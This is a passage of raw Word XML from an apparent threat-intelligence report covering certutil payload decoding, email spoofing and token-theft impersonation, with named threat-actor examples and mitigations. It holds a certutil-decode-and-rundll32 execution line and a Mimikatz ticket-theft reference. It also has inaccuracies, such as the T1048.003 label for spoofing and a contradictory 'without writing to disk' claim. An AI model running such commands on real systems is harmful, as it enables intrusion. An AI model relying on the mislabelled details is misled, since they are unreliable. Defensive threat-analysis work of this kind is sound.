    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Qbot used XOR keys (0xFA, 0x22) to decode configuration files, hiding C2 server addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>GZip Compression via CertUtil for Stealthy Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries abuse Windows’ built-in certutil.exe to decompress GZip-encoded payloads. This avoids downloading suspicious files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>TrickBot executed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>certutil -decode payload.b64 payload.dll &amp;&amp; rundll32 payload.dll,Run</w:t>
      </w:r>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>The .b64 file contained a GZip-compressed DLL, extracted and run without writing to disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>FIN7 used this to deploy Carbanak malware while evading EDR file scans.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Block misuse of LOLBins (e.g., restrict certutil via AppLocker).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95CE9" w:rsidRPr="00A95CE9" w:rsidRDefault="00A95CE9" w:rsidP="00A95CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Deploy runtime code emulators to detect in-memory decoding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45289" w:rsidRDefault="00A45289" w:rsidP="00A45289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>2) Technique: Email Spoofing (T1048.003)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries forge email headers to make messages appear from trusted sources (e.g., colleagues, banks). This bypasses spam filters and tricks recipients into opening malicious attachments/links.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3585"/>
        </w:tabs>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3585"/>
        </w:tabs>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>SMTP Header Manipulation for Domain Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries connect directly to SMTP servers and modify From:, Return-Path:, and Reply-To: fields using tools like Swaks or Python smtplib. No authentication is needed if servers allow open relays.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>TA505 spoofed Microsoft support addresses (support@microsoft.com) to distribute Locky ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Scattered Canary forged IRS tax alerts with From: notices@irs.gov, tricking victims into sharing W-2 forms.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Lookalike Domains + SPF/DKIM Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Register domains resembling legitimate ones (e.g., micros0ft.com vs microsoft.com) and configure them to pass SPF/DKIM checks. This exploits gaps in email authentication protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>TA453 spoofed academic institutions using domains like university-of-l0ndon.org to target researchers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>SolarWinds attackers bypassed SPF by spoofing internal IT addresses (helpdesk@solarwinds.local).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Enforce DMARC, SPF, and DKIM email validation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45289" w:rsidRDefault="000B2497" w:rsidP="00A45289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Train users to inspect email headers for mismatched domains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3) Technique: Impersonation (T1134)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries steal or mimic credentials, tokens, or system processes to masquerade as legitimate users/applications. This grants unauthorized access while evading privilege checks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="397"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Token Theft for SYSTEM Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Use tools like Mimikatz or **Cobalt Strikerunas module to steal Windows access tokens (authentication tickets) from high-privilege processes (e.g., lsass.exe).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>APT29 stole Kerberos tickets from domain controllers using Mimikatz’s sekurlsa::tickets, then impersonated admins to access cloud resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Conti ransomware used SeDebugPrivilege to inject into winlogon.exe, stealing tokens to disable backups.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Service Account Impersonation via Named Pipes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="00053C20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Create malicious named pipes (inter-process communication channels) mimicking legitimate services (e.g., \pipe\spoolss). Legitimate processes connect, allowing adversaries to execute code in their context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="00053C20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
